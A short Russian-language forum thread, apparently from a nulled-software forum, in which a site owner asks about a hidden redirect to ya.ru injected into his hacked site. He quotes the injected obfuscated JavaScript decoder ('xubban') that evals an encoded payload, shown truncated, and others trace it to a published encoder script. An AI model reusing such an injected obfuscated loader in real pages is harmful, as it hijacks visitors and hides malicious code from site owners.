Непонятный редирект

Тема в разделе "Коммерческие", создана пользователем IduKuru, 16 апр 2008.

Информация :
Публиковать (для всех) нуленые версии, особенно от modulesgarden КАТЕГОРИЧЕСКИ не стоит. Тема мониторится оным разработчиком, а к нам приходят абузы которые нельзя игнорировать.
Статус темы:
Закрыта.
Модераторы: Amazko, Aste
  1. IduKuru

IduKuru

Регистр.:
    20 янв 2008
    Симпатии:
    20
    зашел сегодня на свой заброшенный сайт и вдруг меня редиректит на ya.ru видно поломал меня кто-то. Начал смотреть код а там зашифрованный скрипт редиректа на js выполненный через функциию xubban

что вообще за функция такая что про нее даже google не знает?

2. Pir4tt

Pir4tt Создатель

Регистр.:
    13 фев 2008
    Симпатии:
    32
    это краснокнопочный редик, по крайней мере он таким же способом генерит js редиректы - просто создаёт randomname.js с кодом, а через "функцию" передаёт этому файлу параметры редика, читай ключи ;)

3. IduKuru

IduKuru

Регистр.:
    20 янв 2008
    Симпатии:
    20
    randomname.js не было была только строчка в <body>

<script language=JavaScript>function xubban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,7,16,13....26,39,1);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(209^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}xubban('vJM8bTC......hP')</script>

еще папка smarty появилась с php скриптами грохнул к сожалению не глянув что за скрипты

4. tritnu

tritnu Постоялец

Регистр.:
    5 мар 2008
    Симпатии:
    5
    :ah: Сие один в один результат работы разновидности опубликованного мной ранее скрипта в теме "Зашивровать html с помощью javascript":

http://www.nulled.ws/showpost.php?p=418564&postcount=5

Там же можно и расшифровщик сделать из исходного скрипта...

P.S. однако народ у нас быстро использует всякие "полезные вещи"... кстати - я вас не ломал ... :nezn:

5. IduKuru

IduKuru

Регистр.:
    20 янв 2008
    Симпатии:
    20
    а может поможете расшифрощик сделать а то ни ка не в курю как это сделать

Статус темы:
Закрыта.